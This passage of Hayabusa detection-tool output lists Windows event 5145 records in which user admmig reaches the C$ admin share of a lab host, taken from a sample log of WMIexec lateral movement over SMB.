10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 
